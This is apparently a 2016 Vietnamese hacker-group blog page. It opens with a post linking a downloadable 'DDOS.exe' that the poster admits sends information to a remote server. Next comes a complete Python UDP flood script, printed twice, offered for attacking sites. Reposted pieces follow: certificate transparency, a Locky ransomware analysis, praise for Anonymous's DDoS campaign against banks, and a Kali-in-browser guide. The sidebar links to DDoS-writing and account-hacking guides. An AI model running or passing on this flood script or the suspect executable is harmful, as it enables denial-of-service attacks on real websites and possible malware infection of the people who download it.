Đây là tool ddos mình search trên mạng và có config thêm một ít để cho tool đc mạnh hơn. DDOS 5p ở 10 máy khác nhau web liền bị Request time out và sau 30p mới trở lại bt.
Mih share để học tập trao đổi, không khuyến khích đi phá phách người khác.
http://t8ndh.biz/DDOS.exe
Seri search trên mạng nhek. Có đầy ah
tool ddos thì pải có virust mà. Mấy chú có hiểu tool ddoss là j ko thế. ko có keylog, đám bảo đây, thì e đã bảo e config lại cho nó nhận mạnh hơn thông qua hệ thống có sẵn tích hợp perl thui
E nói rõ là tool này hoạt động giống như tool thường nhưng khi ddos nó sẽ gởi info lên server để có thể tiến hành gởi socket bằng perl sẽ khiến server nhanh die hơn là chỉ ddos appche ko. Ai ko dùng thì đừng tak mắc lòng e nghen
Ko hề có keylog cũng như bất cứ j ăn cắp thôgn tin.
Ah, tiện thể đây có bác nào nghiên cứu về ddos ko pm anons44 để hợp tác làm tool nhek
Thứ Hai, 29 tháng 8, 2016
[DDOS] areas ~)) share code python strong !!
#!/usr/bin/python
import socket
import threading
import random
import sys
############################################
# Author:Jo3
# Contact: http://gloomyhackingteam.blogspot.com/
############################################
class attack(threading.Thread):
def __init__ (self, ip, port, psize):
threading.Thread.__init__(self)
self.ip = ip
self.port = port
self.psize = psize
def run(self):
print "Dang tan cong " + self.ip + ":" + str(self.port) + "."
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(self.psize)
while True:
sock.sendto(bytes,(self.ip, self.port))
if len(sys.argv) < 2:
print "tin nhan: "+ sys.argv[0] +" IP PORT PACKETSIZE 1024 10)"
sys.exit()
try:
threads = sys.argv[4]
except NameError:
threads = 10
except IndexError:
threads = 10
try:
if int(sys.argv[3]) > 0 and int(sys.argv[3]) <= 65500:
psize = int(sys.argv[3])
print psize
else:
psize = 1024
except IndexError:
psize = 1024
for host in range(int(threads)):
try:
port = sys.argv[2]
except IndexError:
port = random.randrange(1, 65535, 2)
at = attack(sys.argv[1], int(port), int(psize))
at.start()
import socket
import threading
import random
import sys
############################################
# Author:Jo3
# Contact: http://gloomyhackingteam.blogspot.com/
############################################
class attack(threading.Thread):
def __init__ (self, ip, port, psize):
threading.Thread.__init__(self)
self.ip = ip
self.port = port
self.psize = psize
def run(self):
print "Dang tan cong " + self.ip + ":" + str(self.port) + "."
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(self.psize)
while True:
sock.sendto(bytes,(self.ip, self.port))
if len(sys.argv) < 2:
print "tin nhan: "+ sys.argv[0] +" IP PORT PACKETSIZE 1024 10)"
sys.exit()
try:
threads = sys.argv[4]
except NameError:
threads = 10
except IndexError:
threads = 10
try:
if int(sys.argv[3]) > 0 and int(sys.argv[3]) <= 65500:
psize = int(sys.argv[3])
print psize
else:
psize = 1024
except IndexError:
psize = 1024
for host in range(int(threads)):
try:
port = sys.argv[2]
except IndexError:
port = random.randrange(1, 65535, 2)
at = attack(sys.argv[1], int(port), int(psize))
at.start()
Chủ Nhật, 28 tháng 8, 2016
[DDOS] areas Tìm hiểu về certificate transparency giúp phát hiện chứng chỉ SSL giả mạo
Một backdoor khổng lồ tồn tại trên mạng Internet mà không phải ai cũng biết. Để đảm bảo bảo mật và toàn vẹn dữ liệu cá nhân, hàng tỉ người dùng Internet vẫn đang đặt niềm tin “mù quáng” vào các nhà cung cấp chứng thực số (certificate authority, viết tắt là CA).
Certificate Authority là gì?
Một Certificate Authority (CA) là một tổ chức bên thứ ba hoạt động như một trung gian đáng tin cậy, cấp phát và thẩm định chứng chỉ số SSL/TLS.
Có hàng trăm tổ chức tin cậy như vậy có quyền cấp phát chứng chỉ SSL hợp lệ cho bất cứ domain (tên miền) nào đó của người dùng, dù domain đó đã được cấp chứng chỉ bởi CA khác. Và đó chính là điểm yếu lớn nhất trong hệ thống CA.
Vào năm 2015, Google đã phát hiện ra tổ chức CA Symantec cấp phát trùng lặp chứng chỉ google.com cho một người dùng khác. Đó không phải là vụ việc đầu tiên ảnh hưởng nghiêm trọng đến quyền riêng tư của người dùng. Vào tháng 3/2011, tổ chức CA Comodo đã bị hack và cấp phát chứng chỉ giả mạo của các tên miền phổ biến như mail.google.com, addons.mozilla.org, và login.yahoo.com.
Tài liệu rò rỉ của nhân viên Edward Snowden cho biết Cơ quan An ninh Quốc gia NSA đã can thiệp và bẻ khóa hàng loạt phiên làm việc HTTPS đã được mã hóa. Điều này dấy lên nghi ngờ các cơ quan CA được kiểm soát bởi chính phủ.
Các vụ việc liên quan tới chính phủ
Năm 2011, chứng chỉ số giả mạo cấp phát bởi tổ chức CA DigiNotar đã được sử dụng để tấn công tài khoản Gmail của 300,000 người dùng Iran.
Cuối năm 2013, Google phát hiện chứng chỉ số giả mạo tên miền của mình được sử dụng bởi cơ quan chính phủ Pháp nhằm thực hiện các cuộc tấn công Man-in-the-Middle.
Giữa năm 2014, Google phát hiện một sự cố khác: National Informatics Centre (tổ chức đứng đầu về khoa học công nghệ Ấn Độ) đã sử dụng một vài chứng chỉ số không ủy quyền trên tên miền của mình.
Hệ thống Certificate Transparency là gì?
Certificate Transparency hay CT là một framework mã nguồn mở cho phép cá nhân và tổ chức theo dõi số lượng chứng chỉ bảo mật đã được cấp phát riêng cho domain của họ. CT framework bao gồm:
- Certificate Logs
- Certificate Monitors
- Certificate Auditors
CT yêu cầu các CA khai báo (vào Certificate Log) mọi chứng chỉ số mà cơ quan này tạo ra. Certificate Log sau đó sẽ cung cấp cho người dùng cách thức tìm kiếm tất cả các chứng chỉ số đã được cấp phát cho một domain cho trước. Mô hình CT không thay thế quá trình xác thực hay quy trình thẩm định chứng chỉ số thông thường, đây là một phương pháp bổ sung giúp xác định chứng chỉ của người dùng là duy nhất hay không.
Certificate log có ba đặc tính quan trọng sau:
- Chỉ thêm: Các bản ghi chứng chỉ khi đã được thêm vào log sẽ không thể xóa, sửa hay chèn vào những bản ghi cũ.
- Mã hóa an toàn: Certificates Log sử dụng một cơ chế mã hóa đặc biệt có tên Merkle Tree Hashes’ nhằm ngăn chặn bị can thiệp.
- Kiểm tra công khai: Bất cứ ai cũng có thể truy vấn đến log hoặc kiểm tra chứng chỉ SSL đã được thêm vào log hay chưa.
Trong CT, các chứng chỉ số sẽ chứa một mốc thời gian kí số minh chứng cho việc nó đã được gửi vào Certificates Log trước khi được cấp phát.
Google, DigiCert, Symantec, và một vài CA khác hiện tại đã đăng tải log công khai.
Dù CT không ngăn được CA cấp chứng chỉ giả mạo nhưng nó giúp quá trình phát hiện trở nên dễ dàng hơn.
Người dùng có thể sử dụng công cụ Certificate Transparency Search của Comodo hoặc Certificate Transparency Lookup Tool của Google để kiểm tra tất cả các chứng chỉ bảo mật các tên miền hiện diện công khai trong Certificate Transparency logs.
Read more: http://www.nvm-anons44.blogspot.co.id/2016/08/tim-hieu-ve-certificate-transparency.html#ixzz4IdLfCNs7
#ANONS44
[DDOS] areas PHÂN TÍCH MÃ ĐỘC TỐNG TIỀN LOCKY
Vào tháng 2/2016, mạng Internet đã bị rúng động vì một loại mã độc tống tiền (ransomware) mới có tên là Locky. Theo báo cáo cho thấy mã độc tống tiền Locky đã lây lan người dùng hơn 114 quốc gia trên thế giới. Phân tích mẫu mã độc cho thấy đây là một loại Trojan hoàn toàn mới. Vậy Locky là gì và làm sao có thể chống lại mã độc này? Hãy cùng tìm hiểu.
Cách thức phát tán
Để phát tán một lọai Trojan, tin tặc thường gửi spam lượng lớn email cùng với các tệp tin đính kèm độc hại. Tệp tin đính kèm ở đây là một tệp tin văn bản .DOC chứa macro độc hại tải Locky Trojan từ máy chủ về máy tính nạn nhân và thực thi nó.
Tin nhắn rác chứa tài liệu đính kèm độc hại
Một đoạn mã của macro độc hại
Các phiên bản Microsoft Office mới thường vô hiệu hóa chạy macro tự độc vì lí do bảo mật. Tuy nhiên, thực tế cho thấy người dùng rất thường xuyên kích hoạt thủ công macro, thậm chí ngay cả trên tài liệu tải về từ nguồn không rõ ràng, dẫn đến hậu quả khó lường.
Hiện tại, tin tặc đã thay đổi các tệp tin đính kèm thành tệp tin nén ZIP chứa một hoặc nhiều đoạn mã JavaScript được làm rối nhằm che mắt người dùng. Tin nhắn rác được gửi đến thường được viết bằng tiếng Anh, cũng có một vài ngôn ngữ khác được sử dụng.
Thư rác được viết bằng tiếng Anh với một tệp tin đính kèm được nén
Thư rác được viết bằng tiếng Anh và tiếng Đức
Nội dung tệp tin đính kèm đã được nén
Một đoạn mã script trong tệp tin nén
Nếu được kích hoạt, đoạn mã script sẽ tải về Locky Trojan từ máy chủ trên Internet và khởi chạy nó.
Các quốc gia bị tấn công
Danh sách 10 quốc gia bị lây nhiễm nhiều nhất
Tên quốc gia | Số lượng người dùng bị tấn công |
Pháp | 469 |
Đức | 340 |
Ấn Độ | 267 |
Hoa Kỳ | 224 |
Nam Phi | 182 |
Ý | 171 |
Mexico | 159 |
Brazil | 156 |
Trung Quốc | 126 |
Việt Nam | 107 |
Cần lưu ý rằng thống kê trên chỉ bao gồm những trường hợp mã độc Locky được phát hiện bởi các công cụ diệt virus và không bao gồm các phát hiện giai đoạn đầu như thư rác hoặc các phần mềm độc hại tự động tải mã độc.
Cách thức hoạt động
Locky Trojan là một tệp tin thực thi, có dung lượng khoảng 100 kb. Nó được viết bằng ngôn ngữ C++ sử dụng STL và được biên dịch bởi Microsoft Visual Studio. Khi được khởi động, mã độc sẽ tự sao chép đến %TEMP%\svchost.exe và xóa luồng dữ liệu NTFS trên ổ đĩa cứng – điều này được thực hiện nhằm đảm bảo khi thực thi, Windows không hiển thị cảnh báo rằng tệp tin được tải về từ Internet và có thể gây nguy hiểm. Trojan Locky sẽ được chạy từ thư mục %TEMP%.
Mã độc sẽ kiểm tra sự tồn tại và nội dung của các khóa registry sau:
Đường dẫn | Kiểu | Giá trị |
HKEY_CURRENT_USER\Software\Locky\id | REG_SZ | Infection ID |
HKEY_CURRENT_USER\Software\Locky\pubkey | REG_BINARY | Public RSA key in MSBLOB format |
HKEY_CURRENT_USER\Software\Locky\paytext | REG_BINARY | Text shown to the victim |
HKEY_CURRENT_USER\Software\Locky\completed | REG_DWORD | Status (whether encryption is completed) |
Nếu dữ liệu trên tồn tại trong các khóa registry (có nghĩa là Trojan này đã từng được chạy nhưng bị dừng lại vì lí do nào đó), Locky sẽ đọc dữ liệu và tiếp tục quá trình lây nhiễm. Với lần chạy đầu tiên, Locky sẽ thực hiện các hành vi sau:
- Liên lạc với máy chủ điều khiển C&C và báo cáo lây nhiễm
- Nhận một khóa công khai RSA-2048 và ID lây nhiễm từ máy chủ điều khiển, lưu vào registry
- Gửi thông tin về ngôn ngữ của hệ điều hành bị lây nhiễm, nhận thông báo hiển thị đòi tiền chuộc từ tin tặc, lưu thành dạng text trong registry
- Tìm kiếm các tệp tin với phần mở rộng cụ thể trên ổ đĩa cứng của máy bị lây nhiễm, mã hóa chúng
- Xóa các bản sao chép shadow copies của các tệp tin
- Ghi mã độc vào phần tự khởi động (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run)
- Tìm kiếm và mã hóa các tệp tin có phần mở rộng đặc biệt trên các ổ đĩa của mạng chia sẻ và trên các tài nguyên mạng không được gán tên ổ đĩa
- Hiển thị thông điệp đòi tiền chuộc đến nạn nhân
- Dừng hoạt động và tự xóa
Đoạn mã xác định ngôn ngữ của hệ điều hành
Mã độc Locky sẽ tìm kiếm các tệp tin có phần mở rộng sau đây:
Danh sách các phần mở rộng của tệp tin sẽ bị mã hóa
Mã độc locky thêm đoạn mã vào cuối mỗi tệp tin mã hóa
Với mỗi tệp tin phù hợp, mã độc Locky sẽ tạo ra một khóa 128-bit và mã hóa nội dung tệp tin với thuật toán AES-128 trong chế độ CTR. Tệp tin bị mã hóa sẽ có tên .locky . Cấu trúc sau sẽ được thêm vào phần cuối của tệp tin:
Trong cú pháp ngôn ngữ C, đoạn mã trên được giải thích như sau:
struct file_data { uint32_t start_marker; //Structure start marker = 0x8956FE93 char id[16]; //Infection ID uint8_t aes_key[256]; //AES key encrypted with RSA-2048 uint32_t name_marker; //Name start marker encrypted with AES (= 0xD41BA12A after decryption) uint8_t orig_name[520]; //Original file name encrypted with AES WIN32_FILE_ATTRIBUTE_DATA attr; //Original file attributes encrypted with AES };
Thông điệp đòi tiên chuộc
Sau khi mã hóa tệp tin của người dùng, Trojan Locky sẽ hiển thị thông điệp dưới đây:
Thông điệp đòi tiền chuộc bằng tiếng Anh
Thông điệp đòi tiền chuộc bằng tiếng Đức
Trang thanh toán của Locky phiên bản đầu tiên
Nội dung và thiết kế của trang thanh toán hiện tại đã thay đổi, có sẵn hơn 20 ngôn ngữ để lựa chọn:
Trang thanh toán của Locky phiên bản mới nhất
Danh sách các ngôn ngữ được hỗ trợ trên trang thanh toán của Locky
Trong đoạn mã của Locky chứa từ 1 đến 3 địa chỉ IP của máy chủ C&C. Đoạn mã dùng thuật toán tạo ra địa chỉ C&C mới (DGA, thuật toán tạo tên miền) dựa trên ngày tháng năm hiện tại. Với thuật toán này, 6 địa chỉ C&C được tạo ra mỗi ngày. Đoạn mã giả cho thấy thuật toán DGA được đánh dấu trong hình dưới đây:
Đoạn mã giả thuật toán tạo tên miền C&C Locky
Các dạng thông số được gửi đi bao gồm:
1, Thông báo về lây nhiễm thành công và yêu cầu khóa
id=&act=getkey&affid= &lang= &corp= &serv= &os= &sp= &x64=
2, Gửi danh sách các đường dẫn bị mã hóa
id=&act=report&data=
Với mỗi ổ đĩa đã được xử lý, Locky sẽ gửi dến máy chủ điều khiển một danh sách tất cả đường dẫn của tất cả các tệp tin.
3, Gửi thống kê mỗi ổ đĩa cứng được xử lý
id=&act=stats&path= &encrypted= &failed= &length=
Tin tặc thu thập số liệu thống kê rất chi tiết về mỗi thiết bị lẫy nhiêm. Các họ mã độc tống tiền khác thường không làm việc này.
Các biện pháp ngăn chặn
Locky là một loại mã độc tống tiền điển hình. Tuy nhiên nó lại khiến các nhà nghiên cứu bảo mật chú ý bởi sự linh hoạt và phát tán rộng rãi. Để bảo vệ bản thân khỏi loại mã độc tống tiền Locky, thực hiện các biện pháp sau:
- Không mở các tệp tin đính kèm trong email được gửi từ nguồn không rõ ràng.
- Sao lưu dữ liệu định kì và lưu trữ bản sao sao lưu trên một thiết bị lưu trữ tách khác rời hoặc lưu trữ trên cloud.
- Thường xuyên cập nhật phần mềm diệt virus, hệ điều hành và các phần mềm cài đặt trên máy tính.
- Tạo một thư mục mạng riêng biệt với mỗi người dùng khi quản lý truy cậ
Read more: http://www.nvm-anons44.blogspot.co.id/2016/08/phan-tich-ma-oc-tong-tien-locky.html#ixzz4IdKyAKF6
Hacking News : Anonymous đánh sập 20 ngân hàng trung ương trong chiến dịch tấn công vào hệ thống ngân hàng toàn cầu
Chiến dịch này đã xuất sắc hướng vào các chủ sở hữu ngân hàng hàng đầu, không phải dân thường.
Một tổ chức Hacker két tiếng, gọi chung là Anonymous đã hợp tác kêu gọi các nhóm hacker khác tung ra một chiến dịch lớn gọi là Oplcarus nhằm vào các "cartel ngân hàng tham nhũng".
Nạn nhân đầu tiên của họ là Ngân hàng Trung ương Hy Lạp, sau đó ảnh hưởng mạnh tới các ngân hàng từ các quốc gia còn lại như Cục Dự Trữ Liên Bang Hoa Kỳ Boston, Ngân hàng Anh và Ngân hàng Pháp,
Anonymous đã giải thích ý định của họ trong một thông báo:
"Các ngân hàng đã gián tiếp tới việc giết người, lừa đảo, âm mưu, trục lợi chiến tranh, rửa tiền cho những kẻ khủng bố và băng đảng ma tuý. Đã làm hàng triệu người ra đường phố sống mà không có thức ăn và mua chuộc các chính phủ để họ im lặng. Chúng tôi đại diện cho những người không có tiếng nói."
Cuộc tấn công này đã đánh thẳng vào trái tim Chủ nghĩa đế quốc phương tây, một số ngân hàng đã phải trì trệ hàng giờ mới có quyền truy cập trở lại máy chủ của mình để còn tiếp tục giao dịch. Nhiều người đã đặt câu hỏi về sự hiệu quả của Oplcarus, giám đốc cấp cao Stephanie Weagle của Công ty bảo mật mạng Corero đã nói với một tạp chí Thông tin an ninh mạng:
"Trong khi tác động vào các mục tiêu cá nhân (Cartel ngân hàng) bằng các chiến dịch DDoS, mục đích của "Oplcarus" không hề rõ ràng, nó đã đánh sập hoàn toàn hệ thống máy chủ email sẵn có. Trong một thế giới mạng trực tuyến muốn đánh sập bất kỳ loại dịch vụ nào đó hầu như là không thể, đặc biệt là trong nghành công nghiệp ngân hàng, nơi giao dịch và thông tin liên lạc thường rất nhạy cảm, và bảo mật tài khoản là cực kỳ quan trọng."
*Hậu quả chúng ta đã thấy một tài khoản của ngân hàng Vietcombank bị hack tiền.*
Mặc dù các tin tặc chỉ có thể xâm nhập vào hệ thống máy chủ Email ở một số ngân hàng như Ngân hàng Anh nhưng thiệt hại của nó là quá lớn.
Anonymous muốn đánh vào top 1% giới giàu có chứ không ảnh hưởng tới người dân khi họ giao dịch với ngân hàng, để làm rõ những mục tiêu của họ ta hãy xem ở cuộc phỏng vấn với The Free Thought Project:
"Chúng tôi muốn làm cho rõ ràng rằng tất cả mục tiêu của #Oplcarus là hệ thống ngân hàng Rothschild, BIS và hệ thống ngân hàng trung ương thế giới. Thực tế rằng các mục tiêu chúng tôi đã tấn công cho tới nay chẳng hạn như Guernsey, Cyprus, Panama, Jordan, British Virgin Isles, .v.v là top 10 thiên đường thuế cho giới thượng lưu. Không hề phá các tài khoản người dùng bị hại, không có máy ATM nào bị chặn và không có dữ liệu khách hàng nào bị rò rỉ. Đây đơn giản chỉ là một cuộc biểu tình chống lại các Ngân hàng trung ương và top 1% giới giàu có, không hề có người vô tội hay nghèo bị hại."
Như vậy, có một số nhóm Hacker khác nhau đã cùng tham gia chiến dịch này. Bao gồm cả Ghost Squad Hackers đã chụp ảnh màn hình của site admin các Ngân hàng họ tấn công. Mặc dù cuối cùng các ngân hàng bị tấn công đều trở lại trực tuyến nhưng hậu quả để lại và khắc phục là cực kỳ lâu dài.
Read more: http://www.nvm-anons44.co.id/2016/08/anonymous-anh-sap-20-ngan-hang-trung.html#ixzz4IdK6MU35
#ANONS44
Hướng dẫn cài đặt hệ điều hành kali linux trên trình duyệt web
Đây là tin vui đối với hacker và các chuyên gia nghiên cứu bảo mật: Bạn đã có thể sử dụng hệ điều hành Kali Linux ngay trong một trình duyệt web. Kali Linux là một trong những bản phân phối được cộng đồng bảo mật yêu thích nhất và giờ đã được tích hợp vào trình duyệt web có tên KaliBrowser
Nhà nghiên cứu an ninh mạng Jerry Gamblin đã tạo ra một dự án mang tên KaliBrowser cho phép người dùng sử dụng hệ điều hành Kali Linux trong một trình duyệt web. Gamblin sử dụng kết hợp Kali Linux Docker image, công cụ quản lý cửa sổ Openbox và NoVNC HTML5-based VNC client trong trong trình duyệt của mình.
Kali Linux là một trong những hệ điều hành kiểm thử bảo mật hàng đầu dựa trên nhân Linux kernel và kế thừa thành công của phiên bản cũ là BackTrack. Kali Linux đã được nâng cấp lên phiên bản 2016.1 Debian GNU/Linux 8 “Jessie”.
Trình duyệt KaliBrowser có thể chạy trên tất cả các hệ điều hành bao gồm phiên bản mới nhất của Microsoft Windows 10. Chi tiết cách cài đặt như sau:
Download và cài đặt Docker
Các bước cài đặt Docker
Cài đặt Openbox
git clone git://git.openbox.org/mikachu/openboxCài đặt NoVNC
git clone git://github.com/kanaka/noVNC.git
Cài đặt openbox
Cài đặt NoVNC
*Các bạn chú ý cái địa chỉ IP màu xanh trên cửa sổ Docker và lưu lại để lát truy cập vào.
Cuối cùng, cài đặt KaliBrowser (Trình duyệt Kali)
Gõ lệnh bên dưới để tiến hành cài đặt KaliBrowser cơ bản:
docker run -d -t -i -p 6080:6080 jgamblin/kalibrowser
Cài đặt trình duyệt Kali
http://ip:6080
Với ip là địa chỉ IP màu xanh ở trên (ở bên mình là 192.168.99.100) Vậy nên địa chỉ truy cập sẽ là
http://192.168.99.100:6080
Khởi động KaliBrowser
apt-get install <phần mềm>
Lưu ý: đây là bản cài đặt cơ bản của Kali Linux (dung lượng 841 M8), do đó người dùng cần cài thêm một số công cụ khi muốn sử dụng. Hoặc người dùng có thể cài đặt phiên bản nâng cao (dung lượng 2 G8) cài đặt sẵn Kali Top 10 metapackage thông qua lệnh:
docker run -d -t -i -p 6080:6080 jgamblin/kalibrowser-top10
Read more: http://www.nvm-anons44.co.id/2016/08/su-dung-he-ieu-hanh-kali-linux-tren.html#ixzz4IdJIoOXr
Đăng ký:
Bài đăng (Atom)
CLAY was here - No system is Safe
Anons47-Profiles . Được tạo bởi Blogger.
Wikipedia
Kết quả tìm kiếm
Populars !!
Anonymous - Message to the Citizens of the World VI
When you have a government that operates without limits, who proclaims the right to arrest, torture and kill anyone any, anywhere, with...

Column 1
Sitemap
Tìm kiếm Blog này
Tools For DDoSing
Một cuộc tấn công từ chối dịch vụ (tấn công DoS - Viết tắt của Denial of Service) hay tấn công từ chối dịch vụ phân tán (tấn công DDoS - Viết tắt của Distributed Denial of Service) là một nỗ lực làm cho những người dùng không thể sử dụng tài nguyên của một máy tính.
Anons47 Informations
Recent Posts
- :) - Anons44 Minh Tricker Hacker
Giới thiệu về tôi
Pictures

Images
ANONYMOUS GRUOPS

ANONYMOUS - ANONS47

^
Translate
Page Fans
Entri Populer
-
List Proxy Live 5/11/2015 Tải về Tại đây - Coding Code by ANONS47 =)) ------------------------------------------AN...
-
2 Cách : 1- + Vào trang cá nhân muốn hack ----> Thông tin liên hệ ---------->. giả mạo tôi hoặc ng tôi qen biết !! + Tố cáo ...
-
Hướng dẫn viết phần mềm DDoS đơn giản bằng C# Xin chào các bạn, mình là AD hôm nay mình sẽ hướng dẫn các bạn cách viết 1 Phần mềm DDoS...
-
:) Dear brothers and sisters. Now is the time to open your eyes! In a stunning move that has civil libertarians stuttering with disbelie...
-
Vào tháng 2/2016, mạng Internet đã bị rúng động vì một loại mã độc tống tiền (ransomware) mới có tên là Locky. Theo báo cáo cho thấy mã độc...
-
Chào các bạn! Trên mạng hình thành rất nhiều các trang web có nội dung tuyên truyền cách hack Vcoin bằng cách nạp thẻ Vcoin để nhận s...
-
Chống lại thế lực đen tối Khi nghe đến cái tên hacker, nhiều người thường nghĩ rằng đó là những tin tặc, những tên tội phạm mạng chuyên độ...
-
Ebook tổng hợp học Linux tiếng Việt Bao Gồm : 1. Xóa mù Linux 2. Tự học sử dụng Linux 3. Bảo mật hệ điều hành Linux 4. Cách viết s...
-
Hướng Dẫn Làm Ảnh Đại Diện Video Cho Facebook Facebook vừa cho phép đặt ảnh đại diện bằng video, một tính năng hoàn toàn mới d...
-
Đây là tin vui đối với hacker và các chuyên gia nghiên cứu bảo mật: Bạn đã có thể sử dụng hệ điều hành Kali Linux ngay trong một trình duyệ...
Entri Populer
-
List Proxy Live 5/11/2015 Tải về Tại đây - Coding Code by ANONS47 =)) ------------------------------------------AN...
-
2 Cách : 1- + Vào trang cá nhân muốn hack ----> Thông tin liên hệ ---------->. giả mạo tôi hoặc ng tôi qen biết !! + Tố cáo ...
-
Hướng dẫn viết phần mềm DDoS đơn giản bằng C# Xin chào các bạn, mình là AD hôm nay mình sẽ hướng dẫn các bạn cách viết 1 Phần mềm DDoS...
-
:) Dear brothers and sisters. Now is the time to open your eyes! In a stunning move that has civil libertarians stuttering with disbelie...
-
Vào tháng 2/2016, mạng Internet đã bị rúng động vì một loại mã độc tống tiền (ransomware) mới có tên là Locky. Theo báo cáo cho thấy mã độc...
-
Chào các bạn! Trên mạng hình thành rất nhiều các trang web có nội dung tuyên truyền cách hack Vcoin bằng cách nạp thẻ Vcoin để nhận s...
-
Chống lại thế lực đen tối Khi nghe đến cái tên hacker, nhiều người thường nghĩ rằng đó là những tin tặc, những tên tội phạm mạng chuyên độ...
-
Ebook tổng hợp học Linux tiếng Việt Bao Gồm : 1. Xóa mù Linux 2. Tự học sử dụng Linux 3. Bảo mật hệ điều hành Linux 4. Cách viết s...
-
Hướng Dẫn Làm Ảnh Đại Diện Video Cho Facebook Facebook vừa cho phép đặt ảnh đại diện bằng video, một tính năng hoàn toàn mới d...
-
Đây là tin vui đối với hacker và các chuyên gia nghiên cứu bảo mật: Bạn đã có thể sử dụng hệ điều hành Kali Linux ngay trong một trình duyệ...